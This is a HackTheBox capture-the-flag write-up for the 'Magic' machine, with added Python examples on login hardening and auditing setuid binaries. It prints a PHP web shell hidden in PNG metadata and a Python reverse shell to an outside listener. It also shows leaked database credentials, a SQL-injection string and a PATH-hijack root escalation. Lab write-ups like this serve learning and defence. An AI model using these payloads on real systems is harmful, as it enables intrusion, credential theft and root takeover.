HackTheBox — Magic

Summary

Magic is a medium-rated machine with IP 10.10.10.185.

Enumeration

Nmap

Web Browsing

Port 80

I found a login page, so I decided to try SQL injection.

It redirected me to the upload.php page.

I tried to upload a PHP file, but I got an error.

I decided to inject the payload into a PNG image's metadata using exiftool:

root@strike:~# exiftool -Comment='<?php system($_GET["cmd"]); ?>' test.php.png 
1 image files updated
root@strike:~#

After uploading it, I went to the uploads directory and tried to execute commands.

And it worked. After that, I tried to get a reverse shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",4142));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got it

root@strike:~# nc -lvp 4142
listening on [any] 4142 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.55] from (UNKNOWN) [10.10.10.185] 47278
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/Magic/images/uploads$

Let's enumerate as this user.

www-data@ubuntu:/var/www/Magic$ ls
ls
1 db.php5 index.php logout.php upload.php
assets images login.php magic.sql

Let's take a look at db.php5:

www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

Now we have new credentials, but I couldn't switch to this user with them, so I decided to dump the whole database:

www-data@ubuntu:/tmp$ mysqldump Magic -u theseus -p
mysqldump Magic -u theseus -p
Enter password: iamkingtheseus

-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
...
--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
...
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-08-18 10:22:14
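Two weaknesses surface between the login page and this dump: the login query could be altered by user input, and the admin password sits in the `login` table in plaintext (the next step shows the same value also works for su, so it is reused as a system password too). The following added Python example, which is not part of this write-up or of the Magic application, puts the injectable query pattern beside a hardened login that binds parameters and verifies a salted PBKDF2 hash. An in-memory SQLite table stands in for the MySQL `login` table; the function names, the sample username and the sample password are constructed.

```python
import hashlib
import hmac
import os
import sqlite3

SALT_LEN = 16
PBKDF2_ROUNDS = 100_000   # assumption: raise until one hash costs ~100 ms on your hardware


def hash_password(password: str, salt: bytes = None) -> bytes:
    """Store salt || PBKDF2-HMAC-SHA256(password) instead of the plaintext."""
    salt = salt or os.urandom(SALT_LEN)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def verify_password(stored: bytes, candidate: str) -> bool:
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    attempt = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(digest, attempt)   # constant-time compare


# Hash of a throwaway value so an unknown username costs the same time as a wrong password.
DUMMY_HASH = hash_password("not-a-real-password")


def setup_plaintext_db(username: str, password: str) -> sqlite3.Connection:
    """Constructed stand-in for the original Magic schema: a plaintext password column."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO login (username, password) VALUES (?, ?)", (username, password))
    return conn


def setup_hashed_db(username: str, password: str) -> sqlite3.Connection:
    """Hardened schema: the password column holds only salted PBKDF2 output."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password BLOB)")
    conn.execute("INSERT INTO login (username, password) VALUES (?, ?)",
                 (username, hash_password(password)))
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Before: user input spliced into the SQL text, the defect class behind the
    Magic login bypass. Any input containing a quote changes the query's meaning."""
    query = (f"SELECT id FROM login WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_hardened(conn, username: str, password: str) -> bool:
    """After: bound parameters keep input as a value, and the password is checked
    against its hash in application code rather than by the database."""
    row = conn.execute("SELECT password FROM login WHERE username = ?", (username,)).fetchone()
    if row is None:
        verify_password(DUMMY_HASH, password)   # equalise timing for unknown users
        return False
    return verify_password(row[0], password)


if __name__ == "__main__":
    plain = setup_plaintext_db("admin", "correct horse")
    hashed = setup_hashed_db("admin", "correct horse")
    print("vulnerable, quoted input accepted:", login_vulnerable(plain, "admin", "' OR '1'='1"))
    print("hardened, same input rejected:", not login_hardened(hashed, "admin", "' OR '1'='1"))
```

With bound parameters a quote in the input is just a character inside a value, and with hashing a database dump like the one above yields salts and digests rather than a password that can be typed into su.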

I got a password from the database; let's switch to this user:

www-data@ubuntu:/var/www/Magic$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$

Got the user flag!

Privilege Escalation

SUID Binaries

theseus@ubuntu:~$ find / -perm -u=s 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
.....
.....
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount

Let's take a look at /bin/sysinfo:

theseus@ubuntu:~$ strings /bin/sysinfo
/lib64/ld-linux-x86-64.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
.....
.....
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h

Path Injection
The strings output shows that sysinfo runs lshw -short and the other tools through popen() with bare command names, so whichever lshw is found first in PATH runs with sysinfo's root privileges. I created an executable named lshw in /tmp and added /tmp to the PATH environment variable:

theseus@ubuntu:/tmp$ cat lshw
/bin/bash 1>&0 2>&0
theseus@ubuntu:/tmp$ chmod +x lshw
theseus@ubuntu:/tmp$ ls -al lshw
-rwxrwxr-x 1 theseus theseus 20 Aug 18 16:32 lshw
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Run /bin/sysinfo

theseus@ubuntu:/tmp$ /bin/sysinfo
====================Hardware Info====================
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
info.c root.txt
root@ubuntu:/root#

Got the root flag!
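From the defender's side, the question this step raises is how to find setuid binaries like sysinfo before someone else does. As an added example (not from this write-up), the Python below reproduces what strings(1) extracts, flags strings that look like command lines whose program name carries no path (and so is resolved through the caller's PATH when popen() hands it to /bin/sh -c), and combines that with the setuid bit check the find command above performed. SAMPLE_BINARY is a constructed stand-in for the strings shown above, not a real ELF file, and every function name is an assumption of the example.

```python
import os
import re
import stat

# Heuristic for "a shell command line whose program is resolved through PATH":
# a bare lowercase program name (no '/') followed by flags, paths or words.
COMMAND_LINE = re.compile(
    r"^(?P<prog>[a-z][a-z0-9._+-]{0,30})"
    r"(?:\s+(?:-{1,2}[A-Za-z0-9=,.-]+|/[\w./-]+|[\w.-]+))+$"
)


def extract_strings(data: bytes, min_len: int = 4):
    """Printable ASCII runs of at least min_len bytes, the way strings(1) finds them."""
    found, run = [], bytearray()
    for b in data:
        if 0x20 <= b <= 0x7E:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def find_relative_commands(strings):
    """Command lines that name their program without a path; under popen()/system()
    these resolve via the caller's PATH, which an unprivileged user controls."""
    return [s for s in strings if COMMAND_LINE.match(s)]


def is_setuid(mode: int) -> bool:
    return bool(mode & stat.S_ISUID)


def audit_binary(path: str):
    """Findings for one file: [] unless it is setuid AND embeds PATH-resolved commands."""
    st = os.stat(path)
    if not is_setuid(st.st_mode):
        return []
    with open(path, "rb") as f:
        return find_relative_commands(extract_strings(f.read()))


def audit_tree(root: str = "/"):
    """Walk a filesystem and report every setuid binary that trips the heuristic."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.isfile(path) and not os.path.islink(path):
                    hits = audit_binary(path)
                    if hits:
                        report[path] = hits
            except OSError:
                continue
    return report


# Constructed stand-in for the strings(1) output shown above (not a real ELF file).
SAMPLE_BINARY = b"\x7fELF" + bytes(12) + b"\x00".join([
    b"libstdc++.so.6", b"__gmon_start__", b"popen() failed!",
    b"====================Hardware Info====================",
    b"lshw -short", b"fdisk -l", b"cat /proc/cpuinfo", b"free -h",
    b"/usr/bin/lspci -v",          # absolute path: not a PATH lookup, not flagged
]) + b"\x00"


def audit_sample():
    return find_relative_commands(extract_strings(SAMPLE_BINARY))


if __name__ == "__main__":
    print(audit_sample())
```

The regex is a triage heuristic and will produce some false positives on ordinary message strings, so its output is a list to review, not a verdict. The fix inside such a binary is to invoke helpers by absolute path (or execve them with a fixed environment) instead of popen(), whose /bin/sh -c honours the caller's PATH: setuid execution makes the loader ignore LD_PRELOAD and similar variables, but it does nothing about PATH.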

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!

Ahmed Samir

CTFer | Computer Science Student